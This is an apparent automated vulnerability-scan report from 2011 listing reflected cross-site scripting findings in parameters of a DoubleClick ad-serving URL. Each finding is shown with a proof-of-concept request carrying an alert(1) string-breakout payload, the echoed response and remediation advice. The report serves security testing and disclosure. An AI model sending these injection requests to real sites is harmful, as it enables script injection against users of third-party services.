<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... leclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583ddba6"-alert(1)-"6c8bf62d897&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2% ...[SNIP]...
The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb197"-alert(1)-"30566853739 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3B6423724ab7691482%3B12de6f2f4b2,0%3B%3B%3B932760147,NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAsfTy5i0BAAAAAAAAADg0OTk2MjA4LTJlZGYtMTFlMC1iOTdkLTAwMzA0OGQ2ZDg5MAAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,$http://t.invitemedia.com/track_click?auctionID=12966598381452862-73583&campID=52754&crID=73583&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=;ord=1296659838? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAAD4rFgAptXQAAAAAACzLHQAAAAAAAgAQAAIAAAAAAP8AAAAECkpVJAAAAAAA5-4WAAAAAABeUicAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQPQ4AAAAAAAIAAwAAAAAAAABggqpA1D8AAJD6T6fUPwAAYIKqQNQ.AACQ-k-n1D9HfacomovVPwAA4OnM-NU.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADjya-s.FmSCZIMRPBESjaXH5pC98tmCtRtuX5jAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fn%253B228957569%253B0%252d0%253B0%253B45421688%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dhomepage%26_salt%3D1109920069%26B%3D10%26r%3D0,84996208-2edf-11e0-b97d-003048d6d890
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:33:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9127
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... &pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fhomepage%3Bvid%3D0%3Bugc%3D0%3Blvl%3D4%3Bsz%3D300x250%3Brsi%3D%3Btile%3D2%3Bord%3D8766312252264%3Feb197"-alert(1)-"30566853739&redirectURL=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_im_f_anb_op_ScrFr_pk_300x250%26priorityCode%3D4654900000"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode ...[SNIP]...
The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26dad"-alert(1)-"eeefcf6670b was submitted in the campID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:31:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9729
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... c%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=6767726dad"-alert(1)-"eeefcf6670b&crID=87798&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid% ...[SNIP]...
The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a686a"-alert(1)-"12363754579 was submitted in the crID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798a686a"-alert(1)-"12363754579&pubICode=1502951&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype ...[SNIP]...
The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e4ac"-alert(1)-"f286bd5be45 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9723
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=58661&partnerID=2192e4ac"-alert(1)-"f286bd5be45&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D% ...[SNIP]...
The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97ae1"-alert(1)-"d5a8c8b632 was submitted in the pub parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%253B%257Eaopt%253D2%252f0%252f36%252f0%253B%257Esscs%253D%253f%26e%3D58661%26S%3D%26I%3Dcomputers%26_salt%3D791003084%26B%3D10%26r%3D0,07b4f7d4-2edf-11e0-b4de-003048d6cfae
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 02 Feb 2011 15:32:40 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 9719
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... c%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951&pub=5866197ae1"-alert(1)-"d5a8c8b632&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl ...[SNIP]...
The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1dd4"-alert(1)-"7f0ce352b24 was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5506.150290.INVITEMEDIA/B5070033.24;sz=300x250;click=http://ad.thewheelof.com/clk?2,13%3Bcc4f2de67b5e0116%3B12de6efc24a,0%3B%3B%3B2600164045,NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAASsLv5i0BAAAAAAAAADA3YjRmN2Q0LTJlZGYtMTFlMC1iNGRlLTAwMzA0OGQ2Y2ZhZQAzmSoAAAA=,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,$http://t.invitemedia.com/track_click?auctionID=12966596281452839-87798&campID=67677&crID=87798&pubICode=1502951d1dd4"-alert(1)-"7f0ce352b24&pub=58661&partnerID=219&url=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fadi%2Fdmd%2Eehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F&redirectURL=;ord=1296659628? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?NwQAACcrFgBXtHwAAAAAABTRHwAAAAAAAgAIAAIAAAAAAP8AAAAECgB3HgAAAAAA5-4WAAAAAAD44ykAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC5PQ4AAAAAAAIAAwAAAAAAAIAka89F1z8AAIj9nBzbPwCAJGvPRdc.AACI.Zwc2z-ejamSGMLYPwAAcJCh19w.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAlOcB7KlmSCbftrzIXCBE9jVq9wOUizpEl4mSqAAAAAA==,,http%3A%2F%2Fad.doubleclick.net%2Fadi%2Fdmd.ehow%2Fcomputers%3Bcat%3Dcomputersoftware%3Bscat%3D%3Bsscat%3D%3Bart%3D%3Bqg%3D%3Btc%3D%3Bvid%3D0%3Bctype%3Darticles%3Bugc%3D0%3Blvl%3D1%3Brsi%3D%3Btile%3D3%3Bsz%3D300x250%3Bord%3D4760230283606905%3F,Z%3D300x250%26click%3Dhttp%253a%252f%252fad.doubleclick.net%252fclick%253Bh%253Dv8%252f3aa2%252f3%252f0%252f%252a%252fv%253B228957569%253B0%252d0%253B0%253B45421603%253B4307%252d300%252f250%253B38375088%252f38392845%252f1%253B%2